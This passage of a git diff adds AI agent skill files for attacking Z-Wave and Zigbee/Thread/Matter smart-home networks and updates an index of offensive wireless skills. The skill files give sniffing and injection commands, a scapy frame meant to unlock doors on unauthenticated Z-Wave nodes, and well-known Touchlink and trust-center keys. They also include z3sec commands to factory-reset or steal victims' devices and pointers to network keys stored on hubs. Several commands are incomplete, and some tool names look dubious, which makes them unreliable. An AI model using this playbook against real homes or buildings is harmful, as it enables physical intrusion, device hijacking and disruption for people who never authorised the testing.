github.com/wiire-a/pixiewps +- reaver: github.com/t6x/reaver-wps-fork-t6x +- bully: github.com/aanarchyy/bully +- WPS 2.0 spec (Wi-Fi Alliance) +- "Pixie Dust Attack" (Bongard, 2014) — original disclosure +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-z-wave/SKILL.md b/Skills/wireless/offensive-z-wave/SKILL.md new file mode 100644 index 0000000..b262b9a --- /dev/null +++ b/Skills/wireless/offensive-z-wave/SKILL.md @@ -0,0 +1,146 @@ +--- +name: offensive-z-wave +description: "Z-Wave attack methodology — sniffing with Z-Force / EZ-Wave / RTL-SDR + ZniffMobile, S0 (legacy) network-key derivation flaw and key reuse, S2 (modern) ECDH commissioning analysis, replay/injection on unauthenticated nodes, default-key brute-force on test deployments, and home-automation hub pivots. Use when targeting Z-Wave smart home devices (door locks, sensors, garage controllers) — common in mid-2010s smart home deployments still in production." +--- + +# Z-Wave Attacks + +Z-Wave runs in the 800/900 MHz ISM band (US: 908 MHz, EU: 868 MHz). Older networks used the S0 security scheme with a fixed-derivation network key — long-known to be flawed. S2 (mandatory for Z-Wave Plus v2 since 2017) uses ECDH commissioning and is significantly stronger. + +## Quick Workflow + +1. Identify region (US 908 MHz / EU 868 MHz) — adapter frequency must match +2. Sniff inclusion (commissioning) traffic — that's where keys are exchanged +3. Determine S0 vs S2 from frame format +4. For S0: derive/replay; for S2: analyze ECDH and look for implementation flaws + +--- + +## Hardware + +| Adapter | Use | +|---|---| +| Z-Force (legacy, hard to find) | Original research tool | +| EZ-Wave (custom HackRF firmware) | Modern, full transceiver | +| Aeotec Z-Stick | Commercial controller, useful as legitimate node | +| HackRF + open Z-Wave firmware | Multi-band SDR approach | +| RTL-SDR + ZniffMobile (passive only) | Cheap sniffer | + +## Sniffing + +```bash +# EZ-Wave (HackRF firmware-based) +git clone https://github.com/cureHsu/EZ-Wave +ezwave-sniff -f 908.4MHz -o capture.pcap + +# Wireshark with the Z-Wave dissector parses captured frames +wireshark capture.pcap +``` + +Look for the inclusion phase (controller adding new device) — that's where the network key is exchanged. + +## S0 Security Flaw + +S0 derives the network key from a fixed all-zero PSK during the inclusion of the first device. That fixed material is well-known — any S0 network you sniff during inclusion can be decrypted offline. + +``` +S0 commissioning: + 1. New node joins → controller sends key with zero-PSK encryption + 2. Attacker sniffs commissioning frame → derives session key + 3. All future S0 traffic on that network is decryptable +``` + +If you can: +- Trigger inclusion (factory-reset a node, or wait for legitimate inclusion) +- Sniff during the ~2-second key-exchange window + +You own the network key for that mesh. + +## S2 (Z-Wave Plus / S2 Authenticated) + +S2 fixes S0 by using ECDH for commissioning: +- Each device has a Curve25519 keypair +- Inclusion uses DSK (Device Specific Key) verified out-of-band (sticker/QR) +- Network key never traverses the air in plaintext + +S2 attack surface is mostly implementation: +- Inclusion-mode-always-open (controller misconfig) +- Firmware bugs in S2 verification +- Side-channel on ECDH on resource-constrained chips +- DSK printed on a sticker → physical access yields it + +## Replay / Injection on Unauthenticated Nodes + +Many low-end Z-Wave devices (older sensors, basic switches) don't enforce S0 or S2 — they accept commands in cleartext. + +```python +# scapy-zwave (community fork) for crafted frames +from scapy.contrib.zwave import * +frame = ZWave(home_id=0x12345678)/ZWaveBasic(set_value=0xff) +sendp(frame, iface='ezwave0') +``` + +This unlocks doors / switches lights / unarms sensors when the target lacks authentication. + +## Key Brute-Force + +For old test deployments using default home IDs / network keys: + +```bash +# Try default home IDs +for hid in 0x00000000 0x12345678 ...; do + ezwave-test --home-id $hid --target-node 1 +done +``` + +Hit rate on production is low; useful only for default-config IoT lab gear. + +## Hub Pivots + +Z-Wave devices are typically controlled by a hub (SmartThings, Hubitat, Vera, Home Assistant, Z-Wave JS UI). The hub is a Linux device with the Z-Wave PSK in plaintext storage: + +- SmartThings Hub: previously cloud-only credentials; modern v3 stores network key locally +- Home Assistant: `~/.homeassistant/zwave_js.json` typically contains keys +- Hubitat: web UI with default password on older versions + +Compromise the hub → walk away with the Z-Wave PSK + every paired device's command authority. See `offensive-iot` for hub firmware extraction. + +## Engagement Cheatsheet + +```bash +# 1. Identify region + frequency +# US: 908.4 MHz; EU: 868.4 MHz; CN: 868.4 MHz + +# 2. Sniff +ezwave-sniff -f 908.4MHz -o cap.pcap +wireshark cap.pcap # filter zwave + +# 3. Identify S0 vs S2 from frame format + +# 4. For S0: capture inclusion → derive key → decrypt history + control devices + +# 5. For S2: focus on hub compromise / DSK theft / implementation bugs + +# 6. Test unauthenticated cleartext devices with crafted frames +``` + +## Detection + +- Most Z-Wave deployments have no IDS comparable to Wi-Fi/Zigbee monitoring +- Hub may log unexpected commands but UI rarely surfaces these to users +- Inclusion-mode-open is visible in hub UI but ignored by inattentive admins + +## Reporting + +- Identify chipset / firmware revision per device (ZW0500 series, ZW7000 series) +- Map S0 vs S2 per node — note any S0 left on a network with S2-capable nodes +- Document hub compromise paths separately + +--- + +## Key References + +- EZ-Wave: github.com/cureHsu/EZ-Wave (HackRF-based) +- "Z-Force and the Z-Wave Sniffer" — original research +- Silicon Labs Z-Wave 700-series spec +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-zigbee-thread-matter/SKILL.md b/Skills/wireless/offensive-zigbee-thread-matter/SKILL.md new file mode 100644 index 0000000..20ebba3 --- /dev/null +++ b/Skills/wireless/offensive-zigbee-thread-matter/SKILL.md @@ -0,0 +1,160 @@ +--- +name: offensive-zigbee-thread-matter +description: "Zigbee, Thread, and Matter mesh-protocol attack methodology — IEEE 802.15.4 sniffing with TI CC2531 / CC2540 / Sonoff Zigbee Dongle E, KillerBee toolkit, Touchlink commissioning abuse with the well-known transport key, replay/injection attacks, Zigbee Cluster Library command abuse for door locks and bulbs, Thread network credential theft, Matter commissioning chain analysis, and 6LoWPAN/IPv6 routing exploitation. Use when targeting smart-home or commercial mesh deployments, Zigbee-based door locks, lighting, or sensor networks." +--- + +# Zigbee / Thread / Matter Attacks + +802.15.4-based mesh protocols underpin most "smart home" devices. Zigbee is widely deployed and has well-known crypto-key-reuse issues; Thread (modern, IPv6-based) ships with stronger defaults; Matter unifies their commissioning model with stronger crypto but still has implementation pitfalls. + +## Quick Workflow + +1. Sniff target frequency (channels 11–26 in 2.4 GHz) +2. Identify network coordinator and joining devices +3. For Zigbee: try Touchlink commissioning with the well-known key +4. Capture join-key exchange when devices commission +5. Replay or inject ZCL/ZHA cluster commands + +--- + +## Hardware + +| Adapter | Use | +|---|---| +| TI CC2531 USB stick | Cheap, works with Zigbee2MQTT, KillerBee | +| TI CC2540 / CC2652 | Zigbee + Thread + BLE | +| Sonoff Zigbee Dongle E (CC2652P) | Modern, well-supported | +| ApiMote (KillerBee dev) | Multi-channel, scapy-dot15d4 | +| HackRF + appropriate firmware | Lower-level RF flexibility | + +## Discovery + Sniffing + +```bash +# KillerBee suite +zbstumbler -i 0 # find Zigbee networks +zbid # ID coordinators +zbdump -c 11 -w zigbee.pcap # dump channel 11 to pcap + +# scapy-dot15d4 for crafted frames +python3 +>>> from scapy.contrib.dot15d4 import * +>>> sniff(iface='/dev/ttyACM0', count=50) +``` + +In Wireshark with the dot15d4 + zbee_nwk dissectors, you'll see frame counters, network keys (if joined), and ZCL commands. + +## Touchlink Commissioning Abuse + +Touchlink (used by Zigbee 3.0 commissioning, especially in lighting) uses a **well-known transport key**: + +``` +0x9F559A553B7A6B2C5C4FBB4E84956F3D +``` + +Many consumer Zigbee bulbs / strips accept Touchlink commissioning from any nearby radio with this key — joining them to your network or stealing them from theirs. + +```bash +# z3sec — Zigbee 3 commissioning attack toolkit +git clone https://github.com/IoTsec/Z3sec +python z3sec_inter_pan.py --command "factory_reset_request" --device +python z3sec_inter_pan.py --command "join_network" --network +``` + +Outcomes: +- Factory-reset victim devices remotely (DoS / mass disrupt) +- Steal lights / sensors into attacker network +- Read network keys after joining device-to-network + +## Network Key Capture During Joins + +```bash +# Capture coordinator + joining device exchange +zbdump -c -w join.pcap + +# Decrypt if you obtain the trust center link key +# Older Zigbee 1.x networks used a default trust center link key: +# ZigBeeAlliance09 +# Modern networks use device-specific install codes +``` + +Once you have the network key, all traffic on that mesh is decrypted in Wireshark. + +## ZCL / ZHA Cluster Command Abuse + +Zigbee Cluster Library defines on/off/level/lock clusters. With network key, you can issue commands as any device: + +```python +# scapy-dot15d4 frame to unlock a door lock +from scapy.contrib.dot15d4 import * +from scapy.contrib.zigbee import * + +frame = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK(...)/ZigbeeAppDataPayload(...)/ZCLDoorLock(...) +sendp(frame, iface='/dev/ttyACM0') +``` + +The same primitive opens locks, toggles switches, dims lights, or floods the network with control traffic. + +## Thread Specifics + +Thread (used by Apple HomePod, Nest, Eero) uses 802.15.4 with IPv6 (6LoWPAN) and stronger commissioning crypto. + +- Network credential is a **commissioner-distributed PSKc** +- Devices join with the commissioner present +- Mesh commissioning protocol is over UDP/CoAP + +Attack surface: +- PSKc theft from commissioner devices (mobile app companion, Apple Home, Nest app) +- Reusing a leaked credential to join target network +- 6LoWPAN routing attacks (rank manipulation, sinkhole) + +## Matter Commissioning + +Matter unifies Zigbee/Thread/Wi-Fi device onboarding under one commissioning model: + +- QR code or manual setup code grants commissioning permission +- Bluetooth LE used for initial commissioning +- Subsequent communication over Wi-Fi or Thread + +Attack surface: +- Setup-code reuse / replay if commissioning window not closed +- BLE-MITM during initial commissioning (see `offensive-bluetooth-ble`) +- Fabric-attestation flaws in early implementations + +## Detection + +- Coordinator may log unexpected device joins +- Hub apps surface "new device" notifications — commonly ignored by users +- Wireshark/Sonoff captures from defenders are rare — most environments don't monitor 802.15.4 + +## Engagement Cheatsheet + +```bash +# 1. Identify networks + channels +zbstumbler -i 0 + +# 2. Sniff target channel +zbdump -c -w cap.pcap +# Open in Wireshark with dot15d4/zigbee dissectors + +# 3. Touchlink attack on consumer Zigbee 3.0 lighting +python z3sec_inter_pan.py --command "factory_reset_request" --target + +# 4. Steal device into attacker network +python z3sec_inter_pan.py --command "join_network" --target + +# 5. With network key, issue ZCL commands directly +# (custom scapy-dot15d4 + zbee_nwk frames) + +# 6. For Thread: focus on commissioner / PSKc theft from companion apps +``` + +--- + +## Key References + +- KillerBee: github.com/riverloopsec/killerbee +- Z3sec: github.com/IoTsec/Z3sec +- "Zigbee Insecurity" research (CON Black Hat talks) +- Thread spec: threadgroup.org/support +- Matter / CSA spec: csa-iot.org/all-solutions/matter +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/claude-skills.json b/claude-skills.json index 112e1e9..bd7944f 100644 --- a/claude-skills.json +++ b/claude-skills.json @@ -73,7 +73,20 @@ "offensive-xxe" ], "wireless": [ - "offensive-wifi" + "offensive-bluetooth-ble", + "offensive-bluetooth-classic", + "offensive-deauth-disassoc", + "offensive-evil-twin", + "offensive-krack-fragattacks", + "offensive-lorawan-sub-ghz", + "offensive-wifi", + "offensive-wifi-recon", + "offensive-wpa-enterprise", + "offensive-wpa2-psk", + "offensive-wpa3-sae", + "offensive-wps", + "offensive-z-wave", + "offensive-zigbee-thread-matter" ] }, "skills": [ @@ -341,13 +354,91 @@ "path": "Skills/web/offensive-xxe/SKILL.md", "description": "" }, + { + "name": "offensive-bluetooth-ble", + "category": "wireless", + "path": "Skills/wireless/offensive-bluetooth-ble/SKILL.md", + "description": "Bluetooth Low Energy (BLE) attack methodology — GATT enumeration, characteristic read/write without auth, pairing downgrade (Just Works forced), LE Secure Connections bypass, MITM via active relay, sniffing with Sniffle (TI CC1352) / Ubertooth / Frontline, encryption key extraction (LE Legacy Pairing crackable, LE Secure Connections strong), proximity authentication abuse (cars, locks), and companion-app trust analysis. Use for IoT BLE devices, smart locks, fitness trackers, medical devices, BLE beacons, or any device pairing over BLE." + }, + { + "name": "offensive-bluetooth-classic", + "category": "wireless", + "path": "Skills/wireless/offensive-bluetooth-classic/SKILL.md", + "description": "Bluetooth Classic (BR/EDR) attack methodology — device discovery, service enumeration via SDP, LMP/L2CAP layer attacks, legacy PIN cracking (BlueBorne / KNOB), Bluetooth file-transfer abuse (BlueSnarfing legacy), unauthenticated profile abuse (HSP, HFP, OPP), and modern relevance against older industrial / automotive / accessory targets. Use when in-scope devices use Bluetooth Classic (Bluetooth ≤ 4.0 BR/EDR) — common in legacy car kits, industrial sensors, older medical devices, and audio accessories." + }, + { + "name": "offensive-deauth-disassoc", + "category": "wireless", + "path": "Skills/wireless/offensive-deauth-disassoc/SKILL.md", + "description": "Deauthentication and disassociation attacks against 802.11 networks — targeted single-client deauth for handshake capture, broadcast deauth for DoS (with authorization), action-frame attacks bypassing 802.11w (PMF), beacon flooding, mdk4 / aireplay-ng tooling, and rate-limit / PMF-aware operation. Use to coerce client reconnection (handshake capture, evil-twin roaming), as targeted DoS, or to test PMF posture." + }, + { + "name": "offensive-evil-twin", + "category": "wireless", + "path": "Skills/wireless/offensive-evil-twin/SKILL.md", + "description": "Evil Twin / KARMA / Mana access point methodology — rogue AP construction with hostapd-mana / wifiphisher / airgeddon, KARMA universal probe response, Mana selective probe response, captive portal phishing, deauth-driven client coercion to attacker AP, MAC randomization defeat via PNL leak analysis, post-association MITM (DNS, ARP, transparent proxy), credential capture for portal/web/SMB, and detection-evasion tactics. Use to coerce client devices onto an attacker-controlled AP, intercept their traffic, harvest credentials, or deliver payloads via captive portal." + }, + { + "name": "offensive-krack-fragattacks", + "category": "wireless", + "path": "Skills/wireless/offensive-krack-fragattacks/SKILL.md", + "description": "KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants. Covers Vanhoef's test scripts, viability against modern patched stacks (mostly mitigated post-2021), residual unpatched embedded devices and IoT vendors, and the practical limitations of these attacks in modern engagements. Use when assessing legacy supplicants, embedded clients, or vendors with poor patch cadence." + }, + { + "name": "offensive-lorawan-sub-ghz", + "category": "wireless", + "path": "Skills/wireless/offensive-lorawan-sub-ghz/SKILL.md", + "description": "LoRaWAN and sub-GHz (433 / 868 / 915 MHz) attack methodology — LoRaWAN ABP/OTAA join attack, network/session key reuse, frame counter replay, downlink injection on TTN/Helium-style networks, sub-GHz protocol replay (KeeLoq garage doors, fixed-code remotes, TPMS spoofing, smart plug telemetry), HackRF / RTL-SDR / Flipper Zero workflows, signal analysis with Inspectrum / Universal Radio Hacker, and reconstruction of proprietary packet formats. Use for LoRaWAN deployments (smart cities, asset tracking, industrial telemetry), or any wireless device using the unlicensed 433/868/915 MHz bands (garage openers, doorbells, IoT sensors, RC equipment)." + }, { "name": "offensive-wifi", "category": "wireless", "path": "Skills/wireless/offensive-wifi/SKILL.md", "description": "Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC randomization defeat, BLE/Zigbee/IEEE 802.15.4 sidebands, and Wi-Fi 6/6E/7 considerations. Use when scoping wireless pentest, war-driving an estate, or testing corporate wireless segmentation." + }, + { + "name": "offensive-wifi-recon", + "category": "wireless", + "path": "Skills/wireless/offensive-wifi-recon/SKILL.md", + "description": "Wi-Fi reconnaissance methodology — adapter selection, monitor mode and packet injection setup, regulatory domain handling, multi-band airspace mapping, hidden SSID discovery, BSSID/ESSID/channel/PMF/encryption fingerprinting, client probe analysis, vendor OUI lookup, war-driving with Kismet/airodump-ng/Wigle, and structured airspace data capture for downstream attacks. Use at the start of any wireless engagement to build the target map before active attacks; covers 2.4 GHz, 5 GHz, and 6 GHz (Wi-Fi 6E) bands and adapter compatibility for each." + }, + { + "name": "offensive-wpa-enterprise", + "category": "wireless", + "path": "Skills/wireless/offensive-wpa-enterprise/SKILL.md", + "description": "WPA/WPA2/WPA3-Enterprise (802.1X / EAP) attack methodology — EAP method identification (PEAP-MSCHAPv2, EAP-TTLS, EAP-TLS, EAP-GTC, EAP-PWD, EAP-FAST), evil-twin RADIUS attacks with eaphammer for credential capture, MSCHAPv2 challenge-response cracking, EAP-TLS client certificate theft paths (DPAPI, NDES, AD CS auto-enrollment), supplicant validation bypass (missing server cert validation, missing CN pinning, BYOD misconfigurations), and post-capture pivots into AD via cracked domain credentials. Use for corporate Wi-Fi engagements where the network is 802.1X authenticated." + }, + { + "name": "offensive-wpa2-psk", + "category": "wireless", + "path": "Skills/wireless/offensive-wpa2-psk/SKILL.md", + "description": "WPA/WPA2-PSK attack methodology — four-way handshake capture via targeted deauthentication, PMKID attacks (no client required), hcxdumptool / hcxpcapngtool conversion to hashcat hc22000 format, GPU-accelerated cracking with dictionary, mask, and rule-based attacks, vendor default-PSK generators (UPC, Sky, BT, etc.), 802.11r FT key cracking, opportunistic key cache analysis, and signal-level optimization. Use when the in-scope network is WPA/WPA2 Personal — the most common consumer/SMB encryption mode." + }, + { + "name": "offensive-wpa3-sae", + "category": "wireless", + "path": "Skills/wireless/offensive-wpa3-sae/SKILL.md", + "description": "WPA3 / SAE (Simultaneous Authentication of Equals) attack methodology — transition-mode (mixed WPA2/WPA3) downgrade, Dragonblood side-channel attacks (CVE-2019-9494, 9495, 13377, 13456), SAE auth flooding for AP CPU exhaustion, Hash-to-Element (H2E) timing analysis, group downgrade, and 6 GHz / Wi-Fi 6E spec implications (PMF mandatory, no transition mode allowed). Use when target advertises WPA3-SAE or WPA3-Personal/Enterprise, or operates in 6 GHz where WPA3 + PMF are required by spec." + }, + { + "name": "offensive-wps", + "category": "wireless", + "path": "Skills/wireless/offensive-wps/SKILL.md", + "description": "WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout handling, time-of-day evasion, WPS push-button vulnerability windows, and PIN-to-PSK derivation. Use when a target SOHO router exposes WPS — common on consumer ISP gear, often left enabled by default even when WPS attacks have been known for over a decade." + }, + { + "name": "offensive-z-wave", + "category": "wireless", + "path": "Skills/wireless/offensive-z-wave/SKILL.md", + "description": "Z-Wave attack methodology — sniffing with Z-Force / EZ-Wave / RTL-SDR + ZniffMobile, S0 (legacy) network-key derivation flaw and key reuse, S2 (modern) ECDH commissioning analysis, replay/injection on unauthenticated nodes, default-key brute-force on test deployments, and home-automation hub pivots. Use when targeting Z-Wave smart home devices (door locks, sensors, garage controllers) — common in mid-2010s smart home deployments still in production." + }, + { + "name": "offensive-zigbee-thread-matter", + "category": "wireless", + "path": "Skills/wireless/offensive-zigbee-thread-matter/SKILL.md", + "description": "Zigbee, Thread, and Matter mesh-protocol attack methodology — IEEE 802.15.4 sniffing with TI CC2531 / CC2540 / Sonoff Zigbee Dongle E, KillerBee toolkit, Touchlink commissioning abuse with the well-known transport key, replay/injection attacks, Zigbee Cluster Library command abuse for door locks and bulbs, Thread network credential theft, Matter commissioning chain analysis, and 6LoWPAN/IPv6 routing exploitation. Use when targeting smart-home or commercial mesh deployments, Zigbee-based door locks, lighting, or sensor networks." } ], - "skill_count": 45, + "skill_count": 58, "category_count": 13 }